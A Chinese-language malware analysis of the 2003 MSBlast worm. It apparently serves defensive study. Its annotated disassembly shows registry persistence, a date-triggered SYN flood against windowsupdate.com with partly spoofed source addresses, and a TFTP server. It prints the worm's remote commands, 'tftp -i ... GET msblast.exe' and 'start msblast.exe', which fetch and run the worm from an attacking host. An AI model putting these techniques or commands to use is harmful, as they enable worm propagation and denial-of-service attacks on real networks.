msblast蠕虫主要代码分析

;在注册表中写入自启动项
:00401250 55push ebp
:00401251 89E5mov ebp, esp
:00401253 81ECAC030000sub esp, 000003AC
:00401259 56push esi
:0040125A 57push edi
:0040125B 31F6xor esi, esi
:0040125D 6A00push 00000000
:0040125F 8D45F8lea eax, dword ptr [ebp-08]
:00401262 50push eax
:00401263 6A00push 00000000
:00401265 683F000F00push 000F003F
:0040126A 6A00push 00000000
:0040126C 6A00push 00000000
:0040126E 6A00push 00000000
:00401270 685D484000push 0040485D;db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
:00401275 6802000080push 80000002
:0040127A E80D110000Call 0040238C;ADVAPI32.RegCreateKeyExA
:0040127F 6A32push 00000032
:00401281 683C404000push 0040403C;db 'msblast.exe',0
:00401286 6A01push 00000001
:00401288 6A00push 00000000
:0040128A 6849484000push 00404849;db 'windows auto update',0
:0040128F FF75F8push [ebp-08]
:00401292 E801110000Call 00402398;ADVAPI32.RegSetValueExA
:00401297 FF75F8push [ebp-08]
:0040129A E8E1100000Call 00402380;ADVAPI32.RegCloseKey
;创建互斥体
:0040129F 6843484000push 00404843;db 'BILLY',0
:004012A4 6A01push 00000001
:004012A6 6A00push 00000000
:004012A8 E8A3100000Call 00402350;KERNEL32.CreateMutexA
……………………
;选择发送数据的随机数
:00401476 E8BD0E0000Call 00402338;KERNEL32.GetTickCount
:0040147B 50push eax;用GetTickCount的输出作为srand的随机数种子
:0040147C E8B30F0000Call 00402434;CRTDLL.srand
:00401481 59pop ecx
:00401482 E8890F0000Call 00402410;CRTDLL.rand
:00401487 B914000000mov ecx, 00000014
:0040148C 99cdq
:0040148D F7F9idiv ecx;
:0040148F 83FA0Ccmp edx, 0000000C
:00401492 7D02jge 00401496
:00401494 31F6xor esi, esi
:00401496 C7053431400001000000mov dword ptr [00403134], 00000001
:004014A0 E86B0F0000Call 00402410;CRTDLL.rand
:004014A5 B90A000000mov ecx, 0000000A
:004014AA 99cdq
:004014AB F7F9idiv ecx
:004014AD 83FA07cmp edx, 00000007
:004014B0 7E0Ajle 004014BC
:004014B2 C7053431400002000000mov dword ptr [00403134], 00000002
……………………
:00401954 833D3431400001cmp dword ptr [00403134], 00000001;通过比较这个地址来确定发送针对2000还是XP的攻击代码
:0040195B 750Cjne 00401969
:0040195D C785ECEAFFFF9D130001mov dword ptr [ebp+FFFFEAEC], 0100139D;使用针对Windows XP的跳转地址
:00401967 EB0Ajmp 00401973
:00401969 C785ECEAFFFF9F751800mov dword ptr [ebp+FFFFEAEC], 0018759F;使用针对Windows 2000的跳转地址
……………………
;判断日期
:004014FC 6A03push 00000003;size of buffer
:004014FE 8D45F4lea eax, dword ptr [ebp-0C]
:00401501 50push eax;buffer
:00401502 683C484000push 0040483C;db 'd',0取日期
:00401507 6A00push 00000000
:00401509 6A00push 00000000
:0040150B 6809040000push 00000409;"0409"="en-us;英语 (美国)"
;从GetDateFormatA的Locale参数来看，作者使用的操作系统的区域设置是美国。
:00401510 E8E70D0000Call 004022FC;KERNEL32.GetDateFormatA
:00401515 6A03push 00000003
:00401517 8D45F0lea eax, dword ptr [ebp-10]
:0040151A 50push eax
:0040151B 683A484000push 0040483A;db 'M',0取月份
:00401520 6A00push 00000000
:00401522 6A00push 00000000
:00401524 6809040000push 00000409
:00401529 E8CE0D0000Call 004022FC;KERNEL32.GetDateFormatA
:0040152E 8D45F4lea eax, dword ptr [ebp-0C]
:00401531 50push eax
:00401532 E8790E0000Call 004023B0;CRTDLL.atoi
:00401537 59pop ecx
:00401538 83F80Fcmp eax, 0000000F;比较日期是否大于15日
:0040153B 7F0Fjg 0040154C;日期大于15日则跳到创建DoS线程
:0040153D 8D7DF0lea edi, dword ptr [ebp-10]
:00401540 57push edi
:00401541 E86A0E0000Call 004023B0;CRTDLL.atoi
:00401546 59pop ecx
:00401547 83F808cmp eax, 00000008;比较月份是否大于8月
:0040154A 7E16jle 00401562;月份大于8月则往下执行创建DoS线程
:0040154C 8D45FClea eax, dword ptr [ebp-04]
:0040154F 50push eax
:00401550 6A00push 00000000
:00401552 6A00push 00000000
:00401554 68C11E4000push 00401EC1;DoS子函数
:00401559 6A00push 00000000
:0040155B 6A00push 00000000
:0040155D E8120E0000Call 00402374;KERNEL32.CreateThread
……………………
;处理地址子函数，转换结果保存在eax
:00401E8B 55push ebp
:00401E8C 89E5mov ebp, esp
:00401E8E 56push esi
:00401E8F 57push edi
:00401E90 FF7508push [ebp+08]
:00401E93 E8D8020000Call 00402170;WS2_32.inet_addr
:00401E98 89C7mov edi, eax
:00401E9A 31F6xor esi, esi
:00401E9C 83FFFFcmp edi, FFFFFFFF
:00401E9F 751Ajne 00401EBB;如果是IP地址就直接跳过去，如果不是就先解析域名
:00401EA1 FF7508push [ebp+08]
:00401EA4 E827030000Call 004021D0;WS2_32.gethostbyname
:00401EA9 89C6mov esi, eax
:00401EAB 09F6or esi, esi
:00401EAD 7505jne 00401EB4
:00401EAF 83C8FFor eax, FFFFFFFF
:00401EB2 EB09jmp 00401EBD
:00401EB4 8B460Cmov eax, dword ptr [esi+0C]
:00401EB7 8B00mov eax, dword ptr [eax]
:00401EB9 8B38mov edi, dword ptr [eax]
:00401EBB 89F8mov eax, edi
:00401EBD 5Fpop edi
:00401EBE 5Epop esi
:00401EBF 5Dpop ebp
:00401EC0 C3ret

;DoS子函数
:00401EC1 55push ebp
:00401EC2 89E5mov ebp, esp
:00401EC4 51push ecx
:00401EC5 53push ebx
:00401EC6 56push esi
:00401EC7 57push edi
:00401EC8 C745FC01000000mov [ebp-04], 00000001
:00401ECF 68EC474000push 004047EC;db 'windowsupdate.com',0
:00401ED4 E8B2FFFFFFcall 00401E8B;处理地址子函数
:00401ED9 59pop ecx
:00401EDA 89C6mov esi, eax;esi保存解析出来的IP
:00401EDC 6A01push 00000001
:00401EDE 6A00push 00000000
:00401EE0 6A00push 00000000
:00401EE2 68FF000000push 000000FF
:00401EE7 6A03push 00000003
:00401EE9 6A02push 00000002
:00401EEB E84C030000Call 0040223C;WS2_32.WSASocketA
:00401EF0 89C7mov edi, eax
:00401EF2 83F8FFcmp eax, FFFFFFFF
:00401EF5 7504jne 00401EFB
:00401EF7 31C0xor eax, eax
:00401EF9 EB34jmp 00401F2F
:00401EFB 6A04push 00000004
:00401EFD 8D45FClea eax, dword ptr [ebp-04]
:00401F00 50push eax
:00401F01 6A02push 00000002
:00401F03 6A00push 00000000
:00401F05 57push edi
:00401F06 E8AD020000Call 004021B8;WS2_32.setsockopt
:00401F0B 83F8FFcmp eax, FFFFFFFF
:00401F0E 7504jne 00401F14;成功则跳转
:00401F10 31C0xor eax, eax
:00401F12 EB1Bjmp 00401F2F
:00401F14 57push edi
:00401F15 56push esi
:00401F16 E81B000000call 00401F36;发包函数
:00401F1B 83C408add esp, 00000008
:00401F1E 6A14push 00000014
:00401F20 E837040000Call 0040235C;KERNEL32.Sleep
:00401F25 EBEDjmp 00401F14
:00401F27 57push edi
:00401F28 E8C7020000Call 004021F4;WS2_32.closesocket
:00401F2D 31C0xor eax, eax
:00401F2F 5Fpop edi
:00401F30 5Epop esi
:00401F31 5Bpop ebx
:00401F32 C9leave
:00401F33 C20400ret 0004

;发包函数
:00401F36 55push ebp
:00401F37 89E5mov ebp, esp
:00401F39 81EC9C000000sub esp, 0000009C
:00401F3F 53push ebx
:00401F40 56push esi
:00401F41 57push edi
:00401F42 8D7D9Clea edi, dword ptr [ebp-64]
:00401F45 8D35B0474000lea esi, dword ptr [004047B0]
:00401F4B B90F000000mov ecx, 0000000F
:00401F50 F3repz
:00401F51 A5movsd
:00401F52 66C7857EFFFFFF5000mov word ptr [ebp+FFFFFF7E], 0050
:00401F5B E8D8030000Call 00402338;KERNEL32.GetTickCount
:00401F60 50push eax;GetTickCount的结果作为srand的随机数种子
:00401F61 E8CE040000Call 00402434;CRTDLL.srand
:00401F66 E8A5040000Call 00402410;CRTDLL.rand
:00401F6B 898568FFFFFFmov dword ptr [ebp+FFFFFF68], eax
:00401F71 E89A040000Call 00402410;CRTDLL.rand
:00401F76 B9FF000000mov ecx, 000000FF
:00401F7B 99cdq
:00401F7C F7F9idiv ecx
:00401F7E 52push edx;rand
:00401F7F 8BBD68FFFFFFmov edi, dword ptr [ebp+FFFFFF68]
:00401F85 89F8mov eax, edi
:00401F87 B9FF000000mov ecx, 000000FF
:00401F8C 99cdq
:00401F8D F7F9idiv ecx
:00401F8F 52push edx;rand
:00401F90 FF3538314000push dword ptr [00403138];这两个地址保存的是本机IP的前两字节
:00401F96 FF3514304000push dword ptr [00403014]
;synflood的源IP不是完全随机的，前两个字节是真实的，后两字节随机。
;这可能是考虑到某些网络设备不允许非本网络的IP向外连接
:00401F9C 682B484000push 0040482B;db '%i.%i.%i.%i',0
:00401FA1 8DBD6EFFFFFFlea edi, dword ptr [ebp+FFFFFF6E]
:00401FA7 57push edi;生成的IP
:00401FA8 E87B040000Call 00402428;CRTDLL.sprintf
:00401FAD 8D856EFFFFFFlea eax, dword ptr [ebp+FFFFFF6E]
:00401FB3 50push eax
:00401FB4 E8D2FEFFFFcall 00401E8B;处理地址子函数
:00401FB9 89C3mov ebx, eax;把转换后的IP保存到ebx
;下面开始构造synflood数据包
:00401FBB 66C745800200mov [ebp-80], 0002
:00401FC1 0FB7857EFFFFFFmovzx eax, word ptr [ebp+FFFFFF7E]
:00401FC8 50push eax
;目标端口80
:00401FC9 E88A010000Call 00402158;WS2_32.htons
:00401FCE 89C7mov edi, eax
:00401FD0 66897D82mov word ptr [ebp-7E], di
:00401FD4 8B4508mov eax, dword ptr [ebp+08]
:00401FD7 894584mov dword ptr [ebp-7C], eax
:00401FDA C645EC45mov [ebp-14], 45
:00401FDE 6A28push 00000028
:00401FE0 E873010000Call 00402158;WS2_32.htons
:00401FE5 89C7mov edi, eax
:00401FE7 66897DEEmov word ptr [ebp-12], di
:00401FEB 66C745F00100mov [ebp-10], 0001;ident
:00401FF1 66C745F20000mov [ebp-0E], 0000;Fragment Offset:0
:00401FF7 C645F480mov [ebp-0C], 80;TTL:128
:00401FFB C645F506mov [ebp-0B], 06;Protocol:TCP
:00401FFF 66C745F60000mov [ebp-0A], 0000
:00402005 8B4508mov eax, dword ptr [ebp+08]
:00402008 8945FCmov dword ptr [ebp-04], eax
:0040200B 0FB7857EFFFFFFmovzx eax, word ptr [ebp+FFFFFF7E]
:00402012 50push eax
:00402013 E840010000Call 00402158;WS2_32.htons
:00402018 89C7mov edi, eax
:0040201A 66897DDAmov word ptr [ebp-26], di
:0040201E 8365E000and dword ptr [ebp-20], 00000000
:00402022 C645E450mov [ebp-1C], 50
:00402026 C645E502mov [ebp-1B], 02
:0040202A 6800400000push 00004000;TCP Window:16384
:0040202F E824010000Call 00402158;WS2_32.htons
:00402034 89C7mov edi, eax
:00402036 66897DE6mov word ptr [ebp-1A], di;[ebp-1A]TCP Window:16384
:0040203A 66C745EA0000mov [ebp-16], 0000
:00402040 66C745E80000mov [ebp-18], 0000
:00402046 8B45FCmov eax, dword ptr [ebp-04]
:00402049 894594mov dword ptr [ebp-6C], eax;[ebp-6C]目标IP
:0040204C C6459800mov [ebp-68], 00
:00402050 C6459906mov [ebp-67], 06
:00402054 6A14push 00000014
:00402056 E8FD000000Call 00402158;WS2_32.htons
:0040205B 89C7mov edi, eax
:0040205D 66897D9Amov word ptr [ebp-66], di
:00402061 895DF8mov dword ptr [ebp-08], ebx
:00402064 E8A7030000Call 00402410;CRTDLL.rand
:00402069 B9E8030000mov ecx, 000003E8
:0040206E 99cdq
:0040206F F7F9idiv ecx
:00402071 89D7mov edi, edx
:00402073 81C7E8030000add edi, 000003E8
:00402079 81E7FFFF0000and edi, 0000FFFF
:0040207F 57push edi;随机生成的源端口
:00402080 E8D3000000Call 00402158;WS2_32.htons
:00402085 89C7mov edi, eax
:00402087 66897DD8mov word ptr [ebp-28], di
:0040208B E880030000Call 00402410;CRTDLL.rand
:00402090 898564FFFFFFmov dword ptr [ebp+FFFFFF64], eax
:00402096 E875030000Call 00402410;CRTDLL.rand;随机生成seq number
:0040209B 8BBD64FFFFFFmov edi, dword ptr [ebp+FFFFFF64]
:004020A1 C1E710shl edi, 10
:004020A4 09C7or edi, eax
:004020A6 81E7FFFF0000and edi, 0000FFFF
:004020AC 57push edi
:004020AD E8A6000000Call 00402158;WS2_32.htons
:004020B2 89C7mov edi, eax
:004020B4 81E7FFFF0000and edi, 0000FFFF
:004020BA 897DDCmov dword ptr [ebp-24], edi
:004020BD 895D90mov dword ptr [ebp-70], ebx
:004020C0 6A0Cpush 0000000C
:004020C2 8D4590lea eax, dword ptr [ebp-70]
:004020C5 50push eax
:004020C6 8D459Clea eax, dword ptr [ebp-64]
:004020C9 50push eax
:004020CA E81D030000Call 004023EC;CRTDLL.memcpy
:004020CF 6A14push 00000014
:004020D1 8D45D8lea eax, dword ptr [ebp-28]
:004020D4 50push eax
:004020D5 8D45A8lea eax, dword ptr [ebp-58]
:004020D8 50push eax
:004020D9 E80E030000Call 004023EC;CRTDLL.memcpy
:004020DE 6A20push 00000020
:004020E0 8D459Clea eax, dword ptr [ebp-64]
:004020E3 50push eax
:004020E4 E857FDFFFFcall 00401E40
:004020E9 89C7mov edi, eax
:004020EB 66897DE8mov word ptr [ebp-18], di
:004020EF 6A14push 00000014
:004020F1 8D45EClea eax, dword ptr [ebp-14]
:004020F4 50push eax
:004020F5 8D459Clea eax, dword ptr [ebp-64]
:004020F8 50push eax
:004020F9 E8EE020000Call 004023EC;CRTDLL.memcpy
:004020FE 6A14push 00000014
:00402100 8D45D8lea eax, dword ptr [ebp-28]
:00402103 50push eax
:00402104 8D45B0lea eax, dword ptr [ebp-50];[ebp-50]源端口
:00402107 50push eax
:00402108 E8DF020000Call 004023EC;CRTDLL.memcpy
:0040210D 6A04push 00000004
:0040210F 6A00push 00000000
:00402111 8D45C4lea eax, dword ptr [ebp-3C]
:00402114 50push eax
:00402115 E8DE020000Call 004023F8;CRTDLL.memset
:0040211A 6A28push 00000028
:0040211C 8D459Clea eax, dword ptr [ebp-64]
:0040211F 50push eax
:00402120 E81BFDFFFFcall 00401E40
:00402125 89C7mov edi, eax
:00402127 66897DF6mov word ptr [ebp-0A], di
:0040212B 6A14push 00000014
:0040212D 8D45EClea eax, dword ptr [ebp-14]
:00402130 50push eax
:00402131 8D459Clea eax, dword ptr [ebp-64]
:00402134 50push eax
:00402135 E8B2020000Call 004023EC;CRTDLL.memcpy
:0040213A 83C478add esp, 00000078
:0040213D 6A10push 00000010
:0040213F 8D4580lea eax, dword ptr [ebp-80]
:00402142 50push eax
:00402143 6A00push 00000000
:00402145 6A28push 00000028
:00402147 8D459Clea eax, dword ptr [ebp-64]
:0040214A 50push eax
:0040214B FF750Cpush [ebp+0C]
:0040214E E859000000Call 004021AC;WS2_32.sendto发包
:00402153 5Fpop edi
:00402154 5Epop esi
:00402155 5Bpop ebx
:00402156 C9leave
:00402157 C3ret

………………

;创建tftp服务器函数
:00401576 55push ebp
:00401577 89E5mov ebp, esp
:00401579 81EC2C040000sub esp, 0000042C
:0040157F 53push ebx
:00401580 56push esi
:00401581 57push edi
:00401582 C7053840400001000000mov dword ptr [00404038], 00000001
:0040158C 6A00push 00000000
:0040158E 6A02push 00000002;SOCK_DGRAM使用UDP
:00401590 6A02push 00000002
:00401592 E82D0C0000Call 004021C4;WS2_32.socket
:00401597 A324314000mov dword ptr [00403124], eax
:0040159C 83F8FFcmp eax, FFFFFFFF
:0040159F 0F8445010000je 004016EA
:004015A5 6A10push 00000010
:004015A7 6A00push 00000000
:004015A9 8D85D8FDFFFFlea eax, dword ptr [ebp+FFFFFDD8]
:004015AF 50push eax
:004015B0 E8430E0000Call 004023F8;CRTDLL.memset
:004015B5 83C40Cadd esp, 0000000C
:004015B8 66C785D8FDFFFF0200mov word ptr [ebp+FFFFFDD8], 0002
:004015C1 6A45push 00000045;监听69端口
:004015C3 E8900B0000Call 00402158;WS2_32.htons
:004015C8 89C2mov edx, eax
:004015CA 668995DAFDFFFFmov word ptr [ebp+FFFFFDDA], dx
:004015D1 83A5DCFDFFFF00and dword ptr [ebp+FFFFFDDC], 00000000
:004015D8 6A10push 00000010
:004015DA 8D85D8FDFFFFlea eax, dword ptr [ebp+FFFFFDD8]
:004015E0 50push eax
:004015E1 FF3524314000push dword ptr [00403124]
:004015E7 E8F00B0000Call 004021DC;WS2_32.bind
:004015EC 09C0or eax, eax
:004015EE 0F85F6000000jne 004016EA
:004015F4 C785F8FDFFFF10000000mov dword ptr [ebp+FFFFFDF8], 00000010
:004015FE 8D85F8FDFFFFlea eax, dword ptr [ebp+FFFFFDF8]
:00401604 50push eax
:00401605 8D85E8FDFFFFlea eax, dword ptr [ebp+FFFFFDE8]
:0040160B 50push eax
:0040160C 6A00push 00000000
:0040160E 6804020000push 00000204
:00401613 8D85D4FBFFFFlea eax, dword ptr [ebp+FFFFFBD4]
:00401619 50push eax
:0040161A FF3524314000push dword ptr [00403124]
:00401620 E8630B0000Call 00402188;WS2_32.recvfrom
:00401625 83F801cmp eax, 00000001;如果请求
:00401628 0F8CBC000000jl 004016EA
:0040162E 31DBxor ebx, ebx
:00401630 6837484000push 00404837;db 'rb',0只读、bin模式打开文件
:00401635 6820304000push 00403020;当前文件绝对路径的偏移
:0040163A E8950D0000Call 004023D4;CRTDLL.fopen
;这个蠕虫建立tftp的方式和当年的Nimda是一样的，不管请求的文件名是什么，都返回蠕虫文件。
;所以这个tftp服务器是不会导致系统文件泄露的。和Nimda不同的是，只有成功地攻击了一台机器之后，这个tftp服务器才会运行。
;所以在感染了msblast.exe的系统上没看到监听UDP/69端口是很正常的。

………………

;创建tftp服务器线程，发送tftp命令传送文件及运行
:00401CBD 8D85CCE6FFFFlea eax, dword ptr [ebp+FFFFE6CC]
:00401CC3 50push eax
:00401CC4 6A00push 00000000
:00401CC6 6A00push 00000000
:00401CC8 6876154000push 00401576;创建tftp服务器函数
:00401CCD 6A00push 00000000
:00401CCF 6A00push 00000000
:00401CD1 E89E060000Call 00402374;KERNEL32.CreateThread
:00401CD6 8985C0EDFFFFmov dword ptr [ebp+FFFFEDC0], eax
:00401CDC 6A50push 00000050
:00401CDE E879060000Call 0040235C;KERNEL32.Sleep
:00401CE3 683C404000push 0040403C;db 'msblast.exe',0
:00401CE8 6800304000push 00403000;本机IP
:00401CED 680C484000push 0040480C;db 'tftp -i %s GET %s',0
:00401CF2 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401CF8 50push eax
:00401CF9 E82A070000Call 00402428;CRTDLL.sprintf
:00401CFE 83C410add esp, 00000010
:00401D01 8D8DFCEDFFFFlea ecx, dword ptr [ebp+FFFFEDFC]
:00401D07 83C8FFor eax, FFFFFFFF
:00401D0A 40inc eax
:00401D0B 803C0100cmp byte ptr [ecx+eax], 00
:00401D0F 75F9jne 00401D0A
:00401D11 6A00push 00000000
:00401D13 50push eax
:00401D14 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401D1A 50push eax
:00401D1B FFB5F8EDFFFFpush dword ptr [ebp+FFFFEDF8]
:00401D21 E87A040000Call 004021A0;WS2_32.send
:00401D26 83F801cmp eax, 00000001
:00401D29 0F8CBC000000jl 00401DEB
:00401D2F 68E8030000push 000003E8
:00401D34 E823060000Call 0040235C;KERNEL32.Sleep
:00401D39 31DBxor ebx, ebx
:00401D3B EB0Bjmp 00401D48

:00401D3D 68D0070000push 000007D0
:00401D42 E815060000Call 0040235C;KERNEL32.Sleep
:00401D47 43inc ebx

:00401D48 83FB0Acmp ebx, 0000000A
:00401D4B 7D09jge 00401D56
:00401D4D 833D3840400000cmp dword ptr [00404038], 00000000
:00401D54 75E7jne 00401D3D
:00401D56 683C404000push 0040403C;db 'msblast.exe',0
:00401D5B 6802484000push 00404802;db 'start %s',0
:00401D60 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401D66 50push eax
:00401D67 E8BC060000Call 00402428;CRTDLL.sprintf
:00401D6C 83C40Cadd esp, 0000000C
:00401D6F 8D8DFCEDFFFFlea ecx, dword ptr [ebp+FFFFEDFC]
:00401D75 83C8FFor eax, FFFFFFFF

:00401D78 40inc eax
:00401D79 803C0100cmp byte ptr [ecx+eax], 00
:00401D7D 75F9jne 00401D78
:00401D7F 6A00push 00000000
:00401D81 50push eax
:00401D82 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401D88 50push eax
:00401D89 FFB5F8EDFFFFpush dword ptr [ebp+FFFFEDF8]
:00401D8F E80C040000Call 004021A0;WS2_32.send
:00401D94 83F801cmp eax, 00000001
:00401D97 7C52jl 00401DEB
:00401D99 68D0070000push 000007D0
:00401D9E E8B9050000Call 0040235C;KERNEL32.Sleep
:00401DA3 683C404000push 0040403C;db 'msblast.exe',0
:00401DA8 68FE474000push 004047FE;db '%s',0
:00401DAD 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401DB3 50push eax
:00401DB4 E86F060000Call 00402428;CRTDLL.sprintf
:00401DB9 83C40Cadd esp, 0000000C
:00401DBC 8D8DFCEDFFFFlea ecx, dword ptr [ebp+FFFFEDFC]
:00401DC2 83C8FFor eax, FFFFFFFF
:00401DC5 40inc eax
:00401DC6 803C0100cmp byte ptr [ecx+eax], 00
:00401DCA 75F9jne 00401DC5
:00401DCC 6A00push 00000000
:00401DCE 50push eax
:00401DCF 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401DD5 50push eax
:00401DD6 FFB5F8EDFFFFpush dword ptr [ebp+FFFFEDF8]
:00401DDC E8BF030000Call 004021A0;WS2_32.send
:00401DE1 68D0070000push 000007D0
:00401DE6 E871050000Call 0040235C;KERNEL32.Sleep
:00401DEB 83BDF8EDFFFF00cmp dword ptr [ebp+FFFFEDF8], 00000000
:00401DF2 740Bje 00401DFF
:00401DF4 FFB5F8EDFFFFpush dword ptr [ebp+FFFFEDF8]
:00401DFA E8F5030000Call 004021F4;WS2_32.closesocket
:00401DFF 833D3840400000cmp dword ptr [00404038], 00000000
:00401E06 741Fje 00401E27
:00401E08 6A00push 00000000
:00401E0A FFB5C0EDFFFFpush dword ptr [ebp+FFFFEDC0]
:00401E10 E853050000Call 00402368;KERNEL32.TerminateThread
:00401E15 FF3524314000push dword ptr [00403124]
:00401E1B E8D4030000Call 004021F4;WS2_32.closesocket
:00401E20 83253840400000and dword ptr [00404038], 00000000
:00401E27 83BDC0EDFFFF00cmp dword ptr [ebp+FFFFEDC0], 00000000
:00401E2E 740Bje 00401E3B
:00401E30 FFB5C0EDFFFFpush dword ptr [ebp+FFFFEDC0]
:00401E36 E8F1040000Call 0040232C;KERNEL32.CloseHandle
:00401E3B 5Fpop edi
:00401E3C 5Epop esi
:00401E3D 5Bpop ebx
:00401E3E C9leave
:00401E3F C3ret
;连接到远端后发送命令：
;tftp -i xxx.xxx.xxx.xxx GET msblast.exe
;start msblast.exe
;msblast.exe
;不知道为什么要运行两遍msblast.exe
;tftp下载的文件默认为只读。

从GetDateFormat函数的LCID参数是409来看，作者使用的操作系统的区域设置是美国。

从文件编译时间来看2003年8月11日7点21分。而honeypot上最早捕获的时间是北京时间2003年8月11日14点03分。
如果作者和我们在同一个时区，那么就是6小时后传播到honeypot上的。如果不是，那么作者所在的地方应该在我们的西边不超过6个时区的地方。